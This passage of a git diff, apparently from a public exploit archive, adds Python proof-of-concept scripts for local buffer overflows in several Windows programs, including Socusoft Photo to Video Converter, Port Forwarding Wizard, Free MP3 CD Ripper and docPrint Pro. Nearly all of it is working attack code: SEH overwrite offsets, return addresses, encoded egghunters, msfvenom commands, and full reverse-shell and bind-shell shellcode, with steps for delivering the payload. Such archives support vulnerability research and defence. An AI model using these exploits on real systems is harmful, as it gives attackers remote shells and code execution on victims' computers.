+buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53"
+buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f"
+buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66"
+buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c"
+buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56"
+buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71"
+buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50"
+buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61"
+buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f"
+buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d"
+buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43"
+buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46"
+buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35"
+buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50"
+buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33"
+buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f"
+buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31"
+buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68"
+buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42"
+buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38"
+buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70"
+buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70"
+buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43"
+buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f"
+buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56"
+buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48"
+buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30"
+buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45"
+buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44"
+buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c"
+buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58"
+buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39"
+buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50"
+buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46"
+buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c"
+buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64"
+buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42"
+buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58"
+buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d"
+buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50"
+buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b"
+buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58"
+buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55"
+buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50"
+buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70"
+buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41"
+
+
+egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c\x25\x4A"
+egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"
+
+exploit = "A"*4096
+# 0x67031912 - pop pop ret
+exploit += "\x74\x06\x75\x04"
+exploit += "\x12\x19\x03\x67"
+exploit += egg
+exploit += "C"*(5000-4104)
+exploit += "T00WT00W"
+exploit += buf
+
+f = open("exploit.txt", "w")
+f.write(exploit)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48691.py b/exploits/windows/local/48691.py
new file mode 100755
index 000000000..15e4ac77d
--- /dev/null
+++ b/exploits/windows/local/48691.py
@@ -0,0 +1,102 @@
+# Exploit Title: Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter)
+# Date: 2020-07-23
+# Exploit Author: MasterVlad
+# Vendor Homepage: http://www.dvd-photo-slideshow.com/photo-to-video-converter.html
+# Software Link: https://www.exploit-db.com/apps/ea1720441edd5990a9d0d1ed564a507e-photo-to-video-pro.exe
+# Version: 8.07
+# Vulnerability Type: Local Buffer Overflow
+# Tested on: Windows 10 x64
+
+# Proof of Concept:
+
+# 1. Run the python script
+# 2. Open exploit.txt and copy the content to clipboard
+# 3. Open Socusoft Photo to Video Converter Professional 8.07 and go to Video Output
+# 4. Paste the clipboard into the 'Output Folder' field and click on Open
+
+#!/usr/bin/python
+
+# Badchars: 22, 2a, 3a, 3c, 3e, 3f, 7c + Non-ascii
+
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x22\x2a\x3a\x3c\x3e\x3f\x7c" -f py -e x86/alpha_mixed BufferRegister=EDI
+
+buf = ""
+buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x4b\x4c\x49\x78\x6d\x52\x55\x50\x65\x50\x37\x70\x53"
+buf += "\x50\x6b\x39\x48\x65\x54\x71\x4b\x70\x45\x34\x6c\x4b"
+buf += "\x52\x70\x44\x70\x6e\x6b\x52\x72\x54\x4c\x6c\x4b\x42"
+buf += "\x72\x66\x74\x4e\x6b\x72\x52\x65\x78\x46\x6f\x6c\x77"
+buf += "\x52\x6a\x74\x66\x45\x61\x6b\x4f\x6e\x4c\x45\x6c\x45"
+buf += "\x31\x33\x4c\x55\x52\x34\x6c\x51\x30\x4f\x31\x4a\x6f"
+buf += "\x54\x4d\x46\x61\x39\x57\x5a\x42\x48\x72\x32\x72\x52"
+buf += "\x77\x6c\x4b\x30\x52\x32\x30\x4c\x4b\x72\x6a\x45\x6c"
+buf += "\x6e\x6b\x52\x6c\x42\x31\x42\x58\x79\x73\x57\x38\x76"
+buf += "\x61\x4e\x31\x32\x71\x4c\x4b\x63\x69\x31\x30\x33\x31"
+buf += "\x58\x53\x6e\x6b\x52\x69\x34\x58\x4b\x53\x64\x7a\x30"
+buf += "\x49\x4e\x6b\x36\x54\x4e\x6b\x63\x31\x69\x46\x55\x61"
+buf += "\x79\x6f\x4e\x4c\x4b\x71\x7a\x6f\x54\x4d\x46\x61\x78"
+buf += "\x47\x55\x68\x39\x70\x31\x65\x39\x66\x74\x43\x53\x4d"
+buf += "\x59\x68\x47\x4b\x51\x6d\x66\x44\x61\x65\x78\x64\x56"
+buf += "\x38\x6e\x6b\x61\x48\x37\x54\x76\x61\x6b\x63\x31\x76"
+buf += "\x4c\x4b\x66\x6c\x72\x6b\x4e\x6b\x71\x48\x35\x4c\x33"
+buf += "\x31\x68\x53\x6e\x6b\x75\x54\x4c\x4b\x56\x61\x6a\x70"
+buf += "\x6c\x49\x32\x64\x74\x64\x44\x64\x73\x6b\x31\x4b\x70"
+buf += "\x61\x53\x69\x30\x5a\x63\x61\x6b\x4f\x49\x70\x33\x6f"
+buf += "\x31\x4f\x31\x4a\x4c\x4b\x37\x62\x48\x6b\x4e\x6d\x63"
+buf += "\x6d\x31\x78\x45\x63\x44\x72\x57\x70\x57\x70\x42\x48"
+buf += "\x30\x77\x44\x33\x45\x62\x33\x6f\x33\x64\x30\x68\x50"
+buf += "\x4c\x34\x37\x44\x66\x53\x37\x79\x6f\x68\x55\x4e\x58"
+buf += "\x6a\x30\x63\x31\x53\x30\x33\x30\x75\x79\x68\x44\x42"
+buf += "\x74\x46\x30\x71\x78\x71\x39\x6d\x50\x42\x4b\x77\x70"
+buf += "\x79\x6f\x59\x45\x62\x70\x56\x30\x76\x30\x32\x70\x37"
+buf += "\x30\x56\x30\x31\x50\x66\x30\x53\x58\x78\x6a\x76\x6f"
+buf += "\x49\x4f\x6b\x50\x6b\x4f\x6e\x35\x6c\x57\x33\x5a\x34"
+buf += "\x45\x61\x78\x59\x50\x4f\x58\x39\x34\x6e\x61\x70\x68"
+buf += "\x75\x52\x67\x70\x63\x31\x6f\x4b\x6d\x59\x6a\x46\x61"
+buf += "\x7a\x56\x70\x62\x76\x73\x67\x53\x58\x6d\x49\x69\x35"
+buf += "\x64\x34\x43\x51\x69\x6f\x6e\x35\x6b\x35\x4b\x70\x72"
+buf += "\x54\x76\x6c\x39\x6f\x62\x6e\x65\x58\x64\x35\x6a\x4c"
+buf += "\x55\x38\x5a\x50\x4e\x55\x4c\x62\x30\x56\x4b\x4f\x4a"
+buf += "\x75\x63\x58\x70\x63\x50\x6d\x70\x64\x47\x70\x6b\x39"
+buf += "\x6b\x53\x43\x67\x51\x47\x62\x77\x45\x61\x6a\x56\x43"
+buf += "\x5a\x46\x72\x32\x79\x43\x66\x39\x72\x79\x6d\x61\x76"
+buf += "\x4b\x77\x61\x54\x76\x44\x55\x6c\x66\x61\x63\x31\x6e"
+buf += "\x6d\x43\x74\x76\x44\x74\x50\x4b\x76\x45\x50\x32\x64"
+buf += "\x71\x44\x52\x70\x66\x36\x73\x66\x30\x56\x52\x66\x31"
+buf += "\x46\x42\x6e\x62\x76\x51\x46\x43\x63\x73\x66\x71\x78"
+buf += "\x50\x79\x38\x4c\x67\x4f\x4e\x66\x6b\x4f\x69\x45\x6c"
+buf += "\x49\x6b\x50\x42\x6e\x63\x66\x42\x66\x59\x6f\x64\x70"
+buf += "\x70\x68\x36\x68\x6d\x57\x75\x4d\x51\x70\x79\x6f\x58"
+buf += "\x55\x6d\x6b\x5a\x50\x48\x35\x4e\x42\x76\x36\x52\x48"
+buf += "\x4d\x76\x4f\x65\x4d\x6d\x6f\x6d\x79\x6f\x4a\x75\x57"
+buf += "\x4c\x77\x76\x71\x6c\x57\x7a\x4d\x50\x69\x6b\x69\x70"
+buf += "\x31\x65\x65\x55\x4f\x4b\x72\x67\x67\x63\x31\x62\x72"
+buf += "\x4f\x53\x5a\x75\x50\x72\x73\x6b\x4f\x5a\x75\x41\x41"
+
+
+
+egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x2C\x09\x50\x5c"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"
+
+exploit = "A"*304
+exploit += "\x74\x06\x75\x04"
+# 0x10047a1e
+exploit += "\x1e\x7a\x04\x10"
+exploit += egg
+exploit += "B"*(2000-312-len(egg))
+exploit += "T00WT00W"
+exploit += buf
+
+f = open("exploit.txt", "w")
+f.write(exploit)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48695.py b/exploits/windows/local/48695.py
new file mode 100755
index 000000000..226d2afac
--- /dev/null
+++ b/exploits/windows/local/48695.py
@@ -0,0 +1,75 @@
+# Exploit Title: Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH)
+# Exploit Author: Sarang Tumne
+# Date: 2020-07-18
+# CVE ID: N/A
+# Confirmed on release 4.8.0 and 4.5.0
+# Vendor: http://www.port-forwarding.net/
+# Tested on OS- Windows Vista
+# Buffer overflow in upRedSun Port Forwarding Wizard 4.8.0 and earlier version allows local
+# attackers to execute arbitrary code via a long request in the Register feature.
+
+###############################################
+
+#!/usr/bin/python
+
+file=open("payload.txt","w+b")
+
+buffer="\x90"*164
+buffer+="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x73\x61\x72\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # EggHunter
+buffer+="\x90"*20
+
+shellcode="sarasara" #Egg tag- sarasara
+shellcode+="\x90"*40
+shellcode+=("\xdd\xc7\xd9\x74\x24\xf4\x58\x50\x59\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
+"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
+"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b"
+"\x4c\x6d\x38\x6c\x42\x53\x30\x57\x70\x33\x30\x51\x70\x6e\x69"
+"\x78\x65\x36\x51\x6f\x30\x35\x34\x4e\x6b\x52\x70\x54\x70\x4e"
+"\x6b\x46\x32\x76\x6c\x6c\x4b\x70\x52\x62\x34\x6e\x6b\x33\x42"
+"\x54\x68\x66\x6f\x4e\x57\x71\x5a\x34\x66\x70\x31\x49\x6f\x4e"
+"\x4c\x57\x4c\x65\x31\x61\x6c\x37\x72\x54\x6c\x55\x70\x59\x51"
+"\x48\x4f\x44\x4d\x43\x31\x4a\x67\x49\x72\x5a\x52\x33\x62\x70"
+"\x57\x4c\x4b\x50\x52\x56\x70\x6c\x4b\x73\x7a\x35\x6c\x4c\x4b"
+"\x50\x4c\x42\x31\x70\x78\x49\x73\x53\x78\x46\x61\x4a\x71\x52"
+"\x71\x4e\x6b\x30\x59\x71\x30\x55\x51\x4a\x73\x4e\x6b\x71\x59"
+"\x36\x78\x78\x63\x35\x6a\x37\x39\x6c\x4b\x77\x44\x6e\x6b\x76"
+"\x61\x39\x46\x76\x51\x59\x6f\x6e\x4c\x4a\x61\x78\x4f\x54\x4d"
+"\x77\x71\x5a\x67\x36\x58\x79\x70\x54\x35\x69\x66\x74\x43\x51"
+"\x6d\x58\x78\x55\x6b\x43\x4d\x46\x44\x70\x75\x5a\x44\x50\x58"
+"\x4e\x6b\x62\x78\x65\x74\x73\x31\x6b\x63\x42\x46\x6c\x4b\x36"
+"\x6c\x50\x4b\x4e\x6b\x42\x78\x65\x4c\x33\x31\x69\x43\x4c\x4b"
+"\x47\x74\x4e\x6b\x77\x71\x78\x50\x4c\x49\x50\x44\x76\x44\x66"
+"\x44\x43\x6b\x61\x4b\x31\x71\x51\x49\x63\x6a\x43\x61\x39\x6f"
+"\x49\x70\x61\x4f\x73\x6f\x53\x6a\x4e\x6b\x37\x62\x68\x6b\x6c"
+"\x4d\x63\x6d\x45\x38\x56\x53\x30\x32\x47\x70\x47\x70\x55\x38"
+"\x62\x57\x74\x33\x67\x42\x31\x4f\x61\x44\x33\x58\x50\x4c\x31"
+"\x67\x35\x76\x64\x47\x39\x6f\x6b\x65\x6f\x48\x6a\x30\x37\x71"
+"\x73\x30\x67\x70\x57\x59\x48\x44\x30\x54\x66\x30\x75\x38\x67"
+"\x59\x6d\x50\x32\x4b\x35\x50\x4b\x4f\x6a\x75\x76\x30\x30\x50"
+"\x50\x50\x36\x30\x37\x30\x36\x30\x43\x70\x52\x70\x31\x78\x78"
+"\x6a\x56\x6f\x49\x4f\x69\x70\x4b\x4f\x39\x45\x5a\x37\x31\x7a"
+"\x44\x45\x61\x78\x49\x50\x39\x38\x56\x58\x30\x6c\x73\x58\x55"
+"\x52\x73\x30\x56\x71\x43\x6c\x4c\x49\x4b\x56\x30\x6a\x56\x70"
+"\x43\x66\x70\x57\x31\x78\x5a\x39\x49\x35\x62\x54\x50\x61\x39"
+"\x6f\x7a\x75\x4f\x75\x6f\x30\x73\x44\x46\x6c\x4b\x4f\x70\x4e"
+"\x76\x68\x61\x65\x5a\x4c\x53\x58\x68\x70\x4f\x45\x79\x32\x46"
+"\x36\x59\x6f\x4a\x75\x63\x58\x32\x43\x52\x4d\x61\x74\x57\x70"
+"\x6b\x39\x4a\x43\x63\x67\x76\x37\x63\x67\x64\x71\x69\x66\x62"
+"\x4a\x46\x72\x73\x69\x61\x46\x6a\x42\x6b\x4d\x63\x56\x4a\x67"
+"\x71\x54\x71\x34\x67\x4c\x47\x71\x46\x61\x6c\x4d\x53\x74\x37"
+"\x54\x46\x70\x38\x46\x63\x30\x37\x34\x70\x54\x50\x50\x36\x36"
+"\x61\x46\x52\x76\x53\x76\x53\x66\x50\x4e\x46\x36\x33\x66\x36"
+"\x33\x42\x76\x52\x48\x70\x79\x68\x4c\x37\x4f\x4f\x76\x59\x6f"
+"\x38\x55\x4f\x79\x6b\x50\x70\x4e\x32\x76\x77\x36\x49\x6f\x46"
+"\x50\x55\x38\x44\x48\x6d\x57\x47\x6d\x61\x70\x59\x6f\x6e\x35"
+"\x4d\x6b\x4b\x4e\x74\x4e\x64\x72\x39\x7a\x72\x48\x4e\x46\x6c"
+"\x55\x6f\x4d\x6d\x4d\x59\x6f\x48\x55\x65\x6c\x66\x66\x71\x6c"
+"\x37\x7a\x6f\x70\x79\x6b\x6d\x30\x54\x35\x66\x65\x6f\x4b\x47"
+"\x37\x46\x73\x53\x42\x72\x4f\x72\x4a\x55\x50\x66\x33\x49\x6f"
+"\x39\x45\x41\x41")
+buffer+="\xeb\xb6\x90\x90" #Backward short jump- nseh
+buffer+="\x6d\x57\x37\x7c" #PPR- SEH
+buffer+="A"*200
+file.write(buffer+shellcode)
+file.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48696.py b/exploits/windows/local/48696.py
new file mode 100755
index 000000000..e7558d29a
--- /dev/null
+++ b/exploits/windows/local/48696.py
@@ -0,0 +1,62 @@
+# Exploit Title: Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)
+# Date: 2020-07-22
+# Exploit Author: Eduard Palisek
+# Vendor Homepage: https://www.cleanersoft.com
+# Software Link: https://www.cleanersoft.com/download/FMCRSetup.exe
+# Version: 2.8 Build 20140611
+# Tested on: [Windows XP, Professional, Version 2002, SP 3
+#!/usr/bin/python
+file = open("exploit.wav", "wb")
+
+# msfvenom -p windows/shell_bind_tcp LPORT=9001 -a x86 EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\" -f python -v shellcode_bind
+
+shellcode_bind = b""
+shellcode_bind += b"\xb8\x88\xbf\xa2\x65\xdb\xd6\xd9\x74\x24"
+shellcode_bind += b"\xf4\x5a\x2b\xc9\xb1\x53\x83\xc2\x04\x31"
+shellcode_bind += b"\x42\x0e\x03\xca\xb1\x40\x90\x36\x25\x06"
+shellcode_bind += b"\x5b\xc6\xb6\x67\xd5\x23\x87\xa7\x81\x20"
+shellcode_bind += b"\xb8\x17\xc1\x64\x35\xd3\x87\x9c\xce\x91"
+shellcode_bind += b"\x0f\x93\x67\x1f\x76\x9a\x78\x0c\x4a\xbd"
+shellcode_bind += b"\xfa\x4f\x9f\x1d\xc2\x9f\xd2\x5c\x03\xfd"
+shellcode_bind += b"\x1f\x0c\xdc\x89\xb2\xa0\x69\xc7\x0e\x4b"
+shellcode_bind += b"\x21\xc9\x16\xa8\xf2\xe8\x37\x7f\x88\xb2"
+shellcode_bind += b"\x97\x7e\x5d\xcf\x91\x98\x82\xea\x68\x13"
+shellcode_bind += b"\x70\x80\x6a\xf5\x48\x69\xc0\x38\x65\x98"
+shellcode_bind += b"\x18\x7d\x42\x43\x6f\x77\xb0\xfe\x68\x4c"
+shellcode_bind += b"\xca\x24\xfc\x56\x6c\xae\xa6\xb2\x8c\x63"
+shellcode_bind += b"\x30\x31\x82\xc8\x36\x1d\x87\xcf\x9b\x16"
+shellcode_bind += b"\xb3\x44\x1a\xf8\x35\x1e\x39\xdc\x1e\xc4"
+shellcode_bind += b"\x20\x45\xfb\xab\x5d\x95\xa4\x14\xf8\xde"
+shellcode_bind += b"\x49\x40\x71\xbd\x05\xa5\xb8\x3d\xd6\xa1"
+shellcode_bind += b"\xcb\x4e\xe4\x6e\x60\xd8\x44\xe6\xae\x1f"
+shellcode_bind += b"\xaa\xdd\x17\x8f\x55\xde\x67\x86\x91\x8a"
+shellcode_bind += b"\x37\xb0\x30\xb3\xd3\x40\xbc\x66\x49\x48"
+shellcode_bind += b"\x1b\xd9\x6c\xb5\xdb\x89\x30\x15\xb4\xc3"
+shellcode_bind += b"\xbe\x4a\xa4\xeb\x14\xe3\x4d\x16\x97\x28"
+shellcode_bind += b"\xa7\x9f\x71\x44\xa7\xc9\x2a\xf0\x05\x2e"
+shellcode_bind += b"\xe3\x67\x75\x04\x5b\x0f\x3e\x4e\x5c\x30"
+shellcode_bind += b"\xbf\x44\xca\xa6\x34\x8b\xce\xd7\x4a\x86"
+shellcode_bind += b"\x66\x80\xdd\x5c\xe7\xe3\x7c\x60\x22\x93"
+shellcode_bind += b"\x1d\xf3\xa9\x63\x6b\xe8\x65\x34\x3c\xde"
+shellcode_bind += b"\x7f\xd0\xd0\x79\xd6\xc6\x28\x1f\x11\x42"
+shellcode_bind += b"\xf7\xdc\x9c\x4b\x7a\x58\xbb\x5b\x42\x61"
+shellcode_bind += b"\x87\x0f\x1a\x34\x51\xf9\xdc\xee\x13\x53"
+shellcode_bind += b"\xb7\x5d\xfa\x33\x4e\xae\x3d\x45\x4f\xfb"
+shellcode_bind += b"\xcb\xa9\xfe\x52\x8a\xd6\xcf\x32\x1a\xaf"
+shellcode_bind += b"\x2d\xa3\xe5\x7a\xf6\xc3\x07\xae\x03\x6c"
+shellcode_bind += b"\x9e\x3b\xae\xf1\x21\x96\xed\x0f\xa2\x12"
+shellcode_bind += b"\x8e\xeb\xba\x57\x8b\xb0\x7c\x84\xe1\xa9"
+shellcode_bind += b"\xe8\xaa\x56\xc9\x38"
+
+egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x57\x30\x30\x54\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+nops = "\x90" * 30
+junk1 = "A" * 2112
+tag = "W00TW00T"
+junk2 = "B" * (2000-len(shellcode_bind+nops+tag))
+eip = "\x53\x93\x42\x7e" # 0x7e429353 : jmp esp in user32.dll
+
+buffer = junk1 + tag + nops + shellcode_bind + junk2 + eip + nops + egghunter
+
+file.write(buffer)
+file.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48719.py b/exploits/windows/local/48719.py
new file mode 100755
index 000000000..acf6c7333
--- /dev/null
+++ b/exploits/windows/local/48719.py
@@ -0,0 +1,99 @@
+# Exploit Title: docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)
+# Date: 2020-07-26
+# Exploit Author: MasterVlad
+# Vendor Homepage: http://www.verypdf.com
+# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
+# Version: 8.0
+# Vulnerability Type: Local Buffer Overflow
+# Tested on: Windows 7 32-bit
+
+# Proof of Concept:
+
+# 1. Run the python script
+# 2. Open exploit.txt and copy the content to clipboard
+# 3. Open doc2pdf_win.exe and go to File -> Add URL
+# 4. Paste the clipboard into the field and click on Ok
+
+#!/usr/bin/python
+
+# encoded egghunter
+egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c\x25\x4A"
+egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"
+
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI
+
+buf = ""
+buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63"
+buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b"
+buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70"
+buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37"
+buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53"
+buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f"
+buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66"
+buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c"
+buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56"
+buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71"
+buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50"
